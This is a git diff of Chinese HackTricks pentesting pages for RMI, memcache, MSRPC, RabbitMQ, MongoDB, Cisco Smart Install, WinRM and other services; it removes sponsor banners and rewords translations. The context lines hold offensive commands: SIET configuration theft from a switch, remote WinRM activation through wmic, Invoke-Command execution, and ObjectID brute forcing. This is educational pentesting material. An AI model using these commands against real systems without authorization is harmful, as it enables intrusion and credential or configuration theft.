talk](https://youtu.be/t_aw1mDNhzI?t=202) 中找到。 **默认端口:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 ``` @@ -131,7 +123,7 @@ $ rmg enum 172.17.0.2 9010 [+] --> Deserialization allowed - Vulnerability Status: Vulnerable [+] --> Client codebase enabled - Configuration Status: Non Default ``` -枚举操作的输出在项目的[文档页面](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)中有更详细的说明。根据结果,您应该尝试验证识别出的漏洞。 +枚举操作的输出在项目的[文档页面](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)中有更详细的说明。根据结果,您应该尝试验证已识别的漏洞。 _远程方法猜测器_显示的`ObjID`值可以用来确定服务的正常运行时间。这可能有助于识别其他漏洞: ``` @@ -146,7 +138,7 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' ``` ## 暴力破解远程方法 -即使在枚举过程中没有发现漏洞,可用的 _RMI_ 服务仍可能暴露危险功能。此外,尽管与 _RMI_ 默认组件的 _RMI_ 通信受到反序列化过滤器的保护,但在与自定义 _RMI_ 服务交谈时,这些过滤器通常不存在。因此,了解 _RMI_ 服务上的有效方法签名是非常有价值的。 +即使在枚举过程中没有发现漏洞,现有的 _RMI_ 服务仍可能暴露危险功能。此外,尽管与 _RMI_ 默认组件的 _RMI_ 通信受到反序列化过滤器的保护,但在与自定义 _RMI_ 服务交谈时,这些过滤器通常并不存在。因此,了解 _RMI_ 服务上的有效方法签名是非常有价值的。 不幸的是,_Java RMI_ 不支持枚举 _远程对象_ 上的方法。也就是说,可以使用像 [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 或 [rmiscout](https://github.com/BishopFox/rmiscout) 这样的工具来暴力破解方法签名: ``` @@ -213,7 +205,7 @@ uid=0(root) gid=0(root) groups=0(root) - [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - [rmiscout](https://bishopfox.com/blog/rmiscout) -除了猜测,您还应该在搜索引擎或 _GitHub_ 上查找遇到的 _RMI_ 服务的接口或实现。_bound name_ 和实现的类或接口的名称在这里可能会有所帮助。 +除了猜测,您还应该在搜索引擎或 _GitHub_ 上查找遇到的 _RMI_ 服务的接口或实现。_bound name_ 和实现类或接口的名称在这里可能会有所帮助。 ## 已知接口 @@ -301,12 +293,4 @@ Name: Enumeration Description: Perform basic enumeration of an RMI service Command: rmg enum {IP} {PORT} ``` -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/11211-memcache/memcache-commands.md b/src/network-services-pentesting/11211-memcache/memcache-commands.md index e845994cb..ebbd1a7e6 100644 --- a/src/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/src/network-services-pentesting/11211-memcache/memcache-commands.md @@ -1,12 +1,8 @@ -# Memcache Commands +# Memcache 命令 {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} - -## Commands Cheat-Sheet +## 命令速查表 **来自** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) @@ -14,34 +10,34 @@ 遗憾的是,语法描述并不清晰,简单的帮助命令列出现有命令会更好。以下是您可以在 [source](https://github.com/memcached/memcached) 中找到的命令概述(截至 2016 年 8 月 19 日): -| Command | Description | Example | -| -------------------- | --------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------- | +| 命令 | 描述 | 示例 | +| -------------------- | ------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------------------------- | | get | 读取一个值 | `get mykey` | -| set | 无条件设置一个键 |

set mykey <flags> <ttl> <size>

<p>确保在使用 Unix CLI 工具时使用 \r\n 作为换行符。例如</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| -| add | 添加一个新键 | `add newkey 0 60 5` | -| replace | 覆盖现有键 | `replace key 0 60 5` | -| append | 将数据附加到现有键 | `append key 0 60 15` | -| prepend | 将数据前置到现有键 | `prepend key 0 60 15` | -| incr | 将数值键的值增加指定的数字 | `incr mykey 2` | -| decr | 将数值键的值减少指定的数字 | `decr mykey 5` | -| delete | 删除现有键 | `delete mykey` | -| flush_all | 立即使所有项目失效 | `flush_all` | -| flush_all | 在 n 秒内使所有项目失效 | `flush_all 900` | -| stats | 打印一般统计信息 | `stats` | -| | 打印内存统计信息 | `stats slabs` | -| | 打印更高层次的分配统计信息 | `stats malloc` | -| | 打印项目的信息 | `stats items` | -| | | `stats detail` | -| | | `stats sizes` | -| | 重置统计计数器 | `stats reset` | -| lru_crawler metadump | 转储(大部分)缓存中所有项目的元数据 | `lru_crawler metadump all` | -| version | 打印服务器版本。 | `version` | -| verbosity | 增加日志级别 | `verbosity` | -| quit | 终止会话 | `quit` | +| set | 无条件设置一个键 |

set mykey <flags> <ttl> <size>

<p>确保在使用 Unix CLI 工具时使用 \r\n 作为换行符。例如</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| +| add | 添加一个新键 | `add newkey 0 60 5` | +| replace | 覆盖现有键 | `replace key 0 60 5` | +| append | 将数据附加到现有键 | `append key 0 60 15` | +| prepend | 将数据前置到现有键 | `prepend key 0 60 15` | +| incr | 将数值键的值增加给定的数字 | `incr mykey 2` | +| decr | 将数值键的值减少给定的数字 | `decr mykey 5` | +| delete | 删除现有键 | `delete mykey` | +| flush_all | 立即使所有项目失效 | `flush_all` | +| flush_all | 在 n 秒内使所有项目失效 | `flush_all 900` | +| stats | 打印一般统计信息 | `stats` | +| | 打印内存统计信息 | `stats slabs` | +| | 打印更高层次的分配统计信息 | `stats malloc` | +| | 打印项目信息 | `stats items` | +| | | `stats detail` | +| | | `stats sizes` | +| | 重置统计计数器 | `stats reset` | +| lru_crawler metadump | 转储缓存中(所有)项目的大部分元数据 | `lru_crawler metadump all` | +| version | 打印服务器版本 | `version` | +| verbosity | 增加日志级别 | `verbosity` | +| quit | 终止会话 | `quit` | -#### Traffic Statistics +#### 流量统计 -您可以使用命令查询当前的流量统计信息 +您可以使用命令查询当前流量统计信息 ``` stats ``` @@ -108,7 +104,7 @@ END ``` stats items ``` -命令以确定存在多少个键。 +确定存在多少个键的命令。 ``` stats items STAT items:1:number 220 @@ -120,8 +116,4 @@ END ``` 这至少有助于查看是否使用了任何密钥。要从已经进行 memcache 访问的 PHP 脚本中转储密钥名称,可以使用来自 [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) 的 PHP 代码。 -
- -{% embed url="https://websec.nl/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md index c95eef341..1027707f3 100644 --- a/src/network-services-pentesting/113-pentesting-ident.md +++ b/src/network-services-pentesting/113-pentesting-ident.md @@ -2,16 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %} - ## 基本信息 -**Ident 协议** 用于 **互联网** 上,将 **TCP 连接** 与特定用户关联。最初设计用于 **网络管理** 和 **安全**,它通过允许服务器在 113 端口查询客户端以请求有关特定 TCP 连接用户的信息来操作。 +**Ident协议**用于通过**互联网**将**TCP连接**与特定用户关联。最初设计用于帮助**网络管理**和**安全**,它通过允许服务器在113端口查询客户端以请求有关特定TCP连接用户的信息来操作。 然而,由于现代隐私问题和潜在的滥用,其使用已减少,因为它可能无意中向未经授权的方泄露用户信息。建议采取增强的安全措施,例如加密连接和严格的访问控制,以减轻这些风险。 @@ -38,7 +31,7 @@ PORT STATE SERVICE ### Nmap -默认情况下(\`-sC\`),nmap 将识别每个运行端口的每个用户: +默认情况下(\`-sC\`\`),nmap 将识别每个运行端口的每个用户: ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0) @@ -55,7 +48,7 @@ PORT STATE SERVICE VERSION ``` ### Ident-user-enum -[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) 是一个简单的 PERL 脚本,用于查询 ident 服务 (113/TCP),以确定目标系统上每个 TCP 端口上监听进程的所有者。收集到的用户名列表可用于对其他网络服务进行密码猜测攻击。可以通过 `apt install ident-user-enum` 安装。 +[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) 是一个简单的 PERL 脚本,用于查询 ident 服务 (113/TCP),以确定目标系统上每个 TCP 端口上监听进程的所有者。收集到的用户名列表可以用于对其他网络服务进行密码猜测攻击。可以通过 `apt install ident-user-enum` 安装。 ``` root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445 ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) @@ -73,13 +66,6 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) identd.conf -
- -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %} - ## HackTricks 自动命令 ``` Protocol_Name: Ident #Protocol Abbreviation if there is one. diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index 6a839dee0..92680e1d9 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md @@ -2,24 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金发布和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - ## 基本信息 -Microsoft Remote Procedure Call (MSRPC) 协议是一种客户端-服务器模型,使程序能够请求位于另一台计算机上的程序提供服务,而无需了解网络的具体细节。该协议最初源于开源软件,后来由微软开发并获得版权。 +Microsoft 远程过程调用 (MSRPC) 协议是一种客户端-服务器模型,使程序能够请求位于另一台计算机上的程序提供服务,而无需了解网络的具体细节。该协议最初源于开源软件,后来由 Microsoft 开发并获得版权。 RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问,SMB 在 TCP 139 和 445(使用空会话或经过身份验证的会话)上,以及作为 TCP 端口 593 上的 Web 服务。 ``` @@ -27,13 +12,13 @@ RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问,SMB 在 TCP 139 ``` ## MSRPC是如何工作的? -由客户端应用程序发起,MSRPC过程涉及调用本地存根过程,然后与客户端运行时库交互,以准备并将请求传输到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库决定,确保RPC通过网络栈传递。 +由客户端应用程序发起,MSRPC过程涉及调用本地存根过程,然后与客户端运行时库交互,以准备并传输请求到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库决定,确保RPC通过网络栈传递。 ![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png) ## **识别暴露的RPC服务** -通过查询RPC定位服务和各个端点,可以确定通过TCP、UDP、HTTP和SMB暴露的RPC服务。工具如rpcdump有助于识别唯一的RPC服务,以**IFID**值表示,揭示服务细节和通信绑定: +通过查询RPC定位服务和各个端点,可以确定通过TCP、UDP、HTTP和SMB暴露的RPC服务。工具如rpcdump有助于识别独特的RPC服务,以**IFID**值表示,揭示服务细节和通信绑定: ``` D:\rpctools> rpcdump [-p port] **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 @@ -51,7 +36,7 @@ rpcdump.py -p 135 ``` 所有选项除了 `tcp_dcerpc_auditor` 都是专门针对端口 135 上的 MSRPC 进行攻击设计的。 -#### 知名 RPC 接口 +#### 显著的 RPC 接口 - **IFID**: 12345778-1234-abcd-ef00-0123456789ab - **命名管道**: `\pipe\lsarpc` @@ -86,7 +71,7 @@ rpcdump.py -p 135 ### 使用有效凭据执行 RCE -如果有有效用户的凭据,可以在机器上执行远程代码,使用来自 impacket 框架的 [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py)。 +如果有有效用户的凭据,可以使用来自 impacket 框架的 [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) 在机器上执行远程代码。 **记得尝试不同的可用对象** @@ -104,19 +89,4 @@ rpcdump.py -p 135 - [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) - [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md index 923fac33d..66002ac90 100644 --- a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md +++ b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md @@ -2,17 +2,13 @@ {{#include ../banners/hacktricks-training.md}} -
-**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## 基本信息 您可以在 [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md) 中了解更多关于 RabbitMQ 的信息。\ -如果启用了 [管理插件](https://www.rabbitmq.com/management.html),您可以在此端口找到 RabbitMQ 管理网页控制台。\ -主页面应该看起来像这样: +在此端口,如果启用了 [management plugin](https://www.rabbitmq.com/management.html),您可能会找到 RabbitMQ 管理网页控制台。\ +主页应如下所示: ![](<../images/image (336).png>) @@ -31,7 +27,7 @@ service rabbitmq-server restart 此外,如果您拥有有效的凭据,您可能会发现 `http://localhost:15672/api/connections` 的信息很有趣。 -还要注意,可以使用此服务的 API 通过如下请求**在队列中发布数据**: +还要注意,使用此服务的 API,您可以通过以下请求**在队列中发布数据**: ```bash POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 Host: 172.32.56.72:15672 @@ -51,10 +47,6 @@ hashcat -m 1420 --hex-salt hash.txt wordlist - `port:15672 http` -
-**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/27017-27018-mongodb.md b/src/network-services-pentesting/27017-27018-mongodb.md index 157b2e326..aa1d72040 100644 --- a/src/network-services-pentesting/27017-27018-mongodb.md +++ b/src/network-services-pentesting/27017-27018-mongodb.md @@ -2,24 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! - ## 基本信息 -**MongoDB** 是一个 **开源** 数据库管理系统,使用 **文档导向数据库模型** 来处理多种形式的数据。它为管理非结构化或半结构化数据提供了灵活性和可扩展性,适用于大数据分析和内容管理等应用。 **默认端口:** 27017, 27018 +**MongoDB** 是一个 **开源** 数据库管理系统,使用 **文档导向数据库模型** 来处理多种形式的数据。它为管理非结构化或半结构化数据提供了灵活性和可扩展性,适用于大数据分析和内容管理等应用。**默认端口:** 27017, 27018 ``` PORT STATE SERVICE VERSION 27017/tcp open mongodb MongoDB 2.6.9 2.6.9 @@ -84,20 +69,20 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not 示例 [来自这里](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)。 -Mongo Object IDs 是 **12 字节十六进制** 字符串: +Mongo 对象 ID 是 **12 字节十六进制** 字符串: ![http://techidiocy.com/_id-objectid-in-mongodb/](../images/id-and-ObjectIds-in-MongoDB.png) -例如,以下是我们如何解析应用程序返回的实际 Object ID:5f2459ac9fa6dc2500314019 +例如,以下是我们如何解析应用程序返回的实际对象 ID:5f2459ac9fa6dc2500314019 1. 5f2459ac: 1596217772 的十进制 = 2020年7月31日星期五 17:49:32 2. 9fa6dc: 机器标识符 3. 2500: 进程 ID 4. 314019: 增量计数器 -在上述元素中,机器标识符在数据库运行相同物理/虚拟机器时将保持不变。进程 ID 仅在 MongoDB 进程重启时更改。时间戳每秒更新一次。通过简单地递增计数器和时间戳值来猜测 Object IDs 的唯一挑战在于 Mongo DB 在系统级别生成和分配 Object IDs。 +在上述元素中,机器标识符在数据库运行相同物理/虚拟机时将保持不变。进程 ID 仅在 MongoDB 进程重启时更改。时间戳每秒更新。通过简单地递增计数器和时间戳值来猜测对象 ID 的唯一挑战在于 Mongo DB 在系统级别生成和分配对象 ID。 -工具 [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict),给定一个起始 Object ID(您可以创建一个帐户并获取起始 ID),它会返回大约 1000 个可能分配给下一个对象的 Object IDs,因此您只需对它们进行暴力破解。 +工具 [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict) 在给定起始对象 ID(您可以创建一个帐户并获取起始 ID)时,返回大约 1000 个可能分配给下一个对象的对象 ID,因此您只需对它们进行暴力破解。 ## Post @@ -105,19 +90,4 @@ Mongo Object IDs 是 **12 字节十六进制** 字符串: --- -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金发布和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/4786-cisco-smart-install.md b/src/network-services-pentesting/4786-cisco-smart-install.md index 15a885d39..d3cdaf3f9 100644 --- a/src/network-services-pentesting/4786-cisco-smart-install.md +++ b/src/network-services-pentesting/4786-cisco-smart-install.md @@ -2,13 +2,10 @@ {{#include ../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## 基本信息 -**Cisco Smart Install** 是思科设计的一种工具,用于自动化新思科硬件的初始配置和操作系统镜像的加载。**默认情况下,Cisco Smart Install 在思科硬件上处于活动状态,并使用传输层协议 TCP,端口号为 4786。** +**Cisco Smart Install** 是思科设计的一种自动化新思科硬件初始配置和操作系统镜像加载的工具。**默认情况下,Cisco Smart Install 在思科硬件上处于活动状态,并使用传输层协议 TCP,端口号为 4786。** **默认端口:** 4786 ``` @@ -25,11 +22,11 @@ PORT STATE SERVICE - 调用RCE - 偷取网络设备的配置。 -**该** [**SIET**](https://github.com/frostbits-security/SIET) **(智能安装利用工具)**是为了利用这个漏洞而开发的,它允许你滥用Cisco Smart Install。在本文中,我将向你展示如何读取合法的网络硬件配置文件。配置外泄对渗透测试者来说是有价值的,因为它将了解网络的独特特性。这将使生活更轻松,并允许找到新的攻击向量。 +**该** [**SIET**](https://github.com/frostbits-security/SIET) **(智能安装利用工具)**是为利用此漏洞而开发的,它允许您滥用Cisco Smart Install。在本文中,我将向您展示如何读取合法的网络硬件配置文件。配置外泄对渗透测试人员来说是有价值的,因为它将了解网络的独特特性。这将使生活更轻松,并允许找到新的攻击向量。 -**目标设备将是一个“在线”的Cisco Catalyst 2960交换机。虚拟镜像没有Cisco Smart Install,因此你只能在真实硬件上进行练习。** +**目标设备将是一个“在线”的Cisco Catalyst 2960交换机。虚拟镜像没有Cisco Smart Install,因此您只能在真实硬件上进行练习。** -目标交换机的地址是**10.10.100.10,CSI处于活动状态。**加载SIET并开始攻击。**-g参数**表示从设备中提取配置,**-i参数**允许你设置易受攻击目标的IP地址。 +目标交换机的地址是**10.10.100.10,CSI处于活动状态。**加载SIET并开始攻击。**-g参数**表示从设备中提取配置,**-i参数**允许您设置易受攻击目标的IP地址。 ``` ~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10 ``` @@ -39,8 +36,5 @@ PORT STATE SERVICE
-
- -{% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/4840-pentesting-opc-ua.md b/src/network-services-pentesting/4840-pentesting-opc-ua.md index 836e8d72f..7bfb883dd 100644 --- a/src/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/src/network-services-pentesting/4840-pentesting-opc-ua.md @@ -2,19 +2,11 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - ## 基本信息 -**OPC UA**,即**开放平台通信统一访问**,是一个在制造、能源、航空航天和国防等多个行业中用于数据交换和设备控制的重要开源协议。它独特地使不同供应商的设备能够进行通信,特别是与PLC的通信。 +**OPC UA**,即**开放平台通信统一访问**,是一个在制造、能源、航空航天和国防等多个行业中用于数据交换和设备控制的重要开源协议。它独特地使不同厂商的设备能够进行通信,特别是与PLC的通信。 -其配置允许强大的安全措施,但通常为了与旧设备的兼容性,这些措施会减弱,从而使系统面临风险。此外,查找OPC UA服务可能很棘手,因为网络扫描仪可能无法检测到它们,如果它们位于非标准端口上。 +其配置允许强大的安全措施,但为了与旧设备的兼容性,这些措施往往会减弱,从而使系统面临风险。此外,寻找OPC UA服务可能会很棘手,因为网络扫描仪可能无法检测到它们,如果它们位于非标准端口上。 **默认端口:** 4840 ```text @@ -23,7 +15,7 @@ PORT STATE SERVICE REASON ``` ## Pentesting OPC UA -要揭示OPC UA服务器中的安全问题,请使用[OpalOPC](https://opalopc.com/)进行扫描。 +要揭示 OPC UA 服务器中的安全问题,请使用 [OpalOPC](https://opalopc.com/) 进行扫描。 ```bash opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port ``` @@ -41,12 +33,5 @@ opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port - [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/) -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面,查找让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md index aacef9dc2..341b6911c 100644 --- a/src/network-services-pentesting/512-pentesting-rexec.md +++ b/src/network-services-pentesting/512-pentesting-rexec.md @@ -2,17 +2,10 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} ## 基本信息 -这是一项**允许您在主机内部执行命令的服务**,前提是您知道有效的**凭据**(用户名和密码)。 +它是一个服务,**允许您在主机内部执行命令**,如果您知道有效的**凭据**(用户名和密码)。 **默认端口:** 512 ``` @@ -21,12 +14,5 @@ PORT STATE SERVICE ``` ### [**暴力破解**](../generic-hacking/brute-force.md#rexec) -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index bbddf4fcb..5d5bad7e3 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -2,24 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! - ## WinRM -[Windows Remote Management (WinRM)]() 被微软强调为一种 **协议**,使得通过 HTTP(S) 进行 **Windows 系统的远程管理** 成为可能,并在此过程中利用 SOAP。它基本上由 WMI 驱动,呈现为 WMI 操作的基于 HTTP 的接口。 +[Windows Remote Management (WinRM)]() 被强调为 **微软** 的 **远程管理 Windows 系统** 的 **协议**,通过 HTTP(S) 实现,并在此过程中利用 SOAP。它基本上由 WMI 驱动,呈现为 WMI 操作的基于 HTTP 的接口。 机器上存在 WinRM 允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否正常运行,建议检查特定端口的开放情况: @@ -30,12 +15,12 @@ ### **启动 WinRM 会话** -要为 WinRM 配置 PowerShell,微软的 `Enable-PSRemoting` cmdlet 将发挥作用,设置计算机以接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任: +要为 WinRM 配置 PowerShell,微软的 `Enable-PSRemoting` cmdlet 被使用,以设置计算机接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任: ```powershell Enable-PSRemoting -Force Set-Item wsman:\localhost\client\trustedhosts * ``` -这种方法涉及在 `trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还注意到,可能需要在攻击者的机器上将网络类型从 "Public" 更改为 "Work"。 +这种方法涉及在 `trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还注意到,可能需要在攻击者的机器上将网络类型从“公共”更改为“工作”。 此外,可以使用 `wmic` 命令**远程激活** WinRM,示例如下: ```powershell @@ -47,7 +32,7 @@ wmic /node: process call create "powershell enable-psremoting -forc 要验证攻击机器的设置,使用 `Test-WSMan` 命令检查目标是否正确配置了 WinRM。通过执行此命令,您应该期望收到有关协议版本和 wsmid 的详细信息,指示配置成功。以下是演示已配置目标与未配置目标预期输出的示例: -- 对于**已**正确配置的目标,输出将类似于以下内容: +- 对于一个 **已** 正确配置的目标,输出将类似于: ```bash Test-WSMan ``` @@ -67,7 +52,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al ``` ![](<../images/image (151).png>) -您还可以通过 _**Invoke-Command**_ **执行当前 PS 控制台的命令**。假设您在本地有一个名为 _**enumeration**_ 的函数,并且您想要在远程计算机上 **执行它**,您可以这样做: +您还可以通过 _**Invoke-Command**_ **在当前 PS 控制台中执行命令**。假设您在本地有一个名为 _**enumeration**_ 的函数,并且您想要 **在远程计算机上执行它**,您可以这样做: ```powershell Invoke-Command -ComputerName -ScriptBLock 